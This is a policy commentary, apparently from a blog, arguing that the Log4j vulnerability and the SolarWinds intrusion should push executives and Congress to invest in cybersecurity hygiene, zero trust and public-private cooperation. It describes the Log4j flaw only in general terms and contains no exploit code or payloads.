Will The Log4j Exploit Move Leaders To Heed Cybersecurity Warnings?

A year since SolarWinds set the security world on fire, we are now faced with another potentially devastating cyber incident. The Log4j vulnerability  is the latest exploit with the potential to incur significant economic and national security harm. Although SolarWinds and Log4j represent very different incidents on a technical level, both expose key lessons – and warnings – for organizational leaders, including entire C-Suites, not just Chief Information Officers (CIO) and Chief Information Security Officers (CISO), and policymakers.

First, it’s important to understand why this most recent incident is so consequential. Log4j is a Java logging library included in the Apache open-source project. That means it is a standard set of collaboratively developed and publicly accessible software (open source) that is very commonly used to collect and store records (logging) of activity on a server, such as one operating a website. Those logs are captured for many purposes, including to monitor the performance of the system, but also, ironically, to examine the security implications of potentially anomalous events. Ideally, the log files are static; they capture and store records for analytic purposes, and that’s it. In this case, the newly discovered vulnerability allows a malicious actor to introduce a string of data that enables remote execution of code on the logging server. Thus, many of the reported incidents are the result of malicious users finding new ways to introduce compromised information into system logs.

Numerous examples have already been reported of seemingly benign items like chat messages containing those malicious data strings. That exposure alone demonstrates the breadth of this vulnerability, but further evidence of that can be found in the proof-of-concept exploits made public. Any user can leverage those exploits for their own purposes, such as taking control of cryptocurrency mining servers, and reports of compromised systems are proliferating rapidly. Because Apache is so widespread, it’s inevitable that those compromises will continue to grow for weeks or months, and will include systems that are only indirectly exposed through the use of Log4j by a service provider.

In contrast to this scenario, SolarWinds leveraged a complex supply chain intrusion to introduce a new vulnerability into a packaged commercial software product. Although there were many impacted organizations, the intrusion was the work of sophisticated adversaries targeting a very specific weak point, and largely used to gain access to high profile government and corporate networks.

Although very different in technical details, these incidents reveal several critical points in common. First and foremost, leaders can never be complacent about cyber threats. It is, almost literally, not possible to do enough to be completely and provably secure in the modern, complex, and connected world. All leaders, not just CIOs and CISOs, need to be constantly vigilant, thinking about the risks faced by their organizations, and be prepared to respond rapidly if (when) the worst happens. Without that preparedness, they leave their organization vulnerable to terrible consequences. It’s also up to those leaders to think about the cost of this vigilance and find ways to invest appropriately.

Second, organizations need to be rigorous and proactive in adopting the basics of good cybersecurity hygiene. The core items that cybersecurity experts have highlighted for years – such as scanning your network for known vulnerabilities and fixing them expeditiously, managing access to sensitive data, and ensuring that you have data backed up for recovery purposes – aren’t a silver bullet, but they will certainly reduce the risk of or mitigate an intrusion, and make your recovery as smooth as possible. For example, in this most recent incident, there was a fix already available before the vulnerability became widely known. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and others are actively encouraging organizations to upgrade Log4j to that patched version as a critical response step. While necessary, if you have been compromised, the nature of this exploit means that you need to look deeper at your systems to ensure that bad actors have not spread out from the initial intrusion.

Third, as organizations move beyond cyber hygiene basics, they should apply the principles of zero trust, something the U.S. government has been advocating for to improve its own cybersecurity posture in response to the SolarWinds incident. Although the leap to a true zero-trust architecture is complex and time consuming, it forces organizations to think carefully about their most sensitive data, and how access to it can and should be controlled. Proper segmentation of those data can minimize the organizational cost of an intrusion, and detailed monitoring of activity, especially around those critical assets, can help quickly identify when an intrusion has taken place, and possibly limit the scope

Finally, Log4j is yet another example of why the U.S. Congress must prioritize enhanced cybersecurity in 2022. The important hearings and discussions on this issue in 2021 have highlighted the scope of the challenges and underscored that lawmakers will hold executives who fail to take cyber issues seriously accountable. But at the same time, they also demonstrated that the challenges continue to evolve dramatically. Congress’s initial investments in state and local cybersecurity in the Infrastructure and Investment Jobs Act must be accompanied by comparable investments elsewhere, along with clear and consistent direction on the importance of public-private cooperation in critical matters such as threat sharing and incident reporting. As has been widely noted, this is a team sport, but we’re struggling to even stay on the field today.

Looking ahead, it’s critical that industry and government partners collectively re-commit to the investments necessary to stay competitive with these dynamic and evolving threats.

Comments are closed.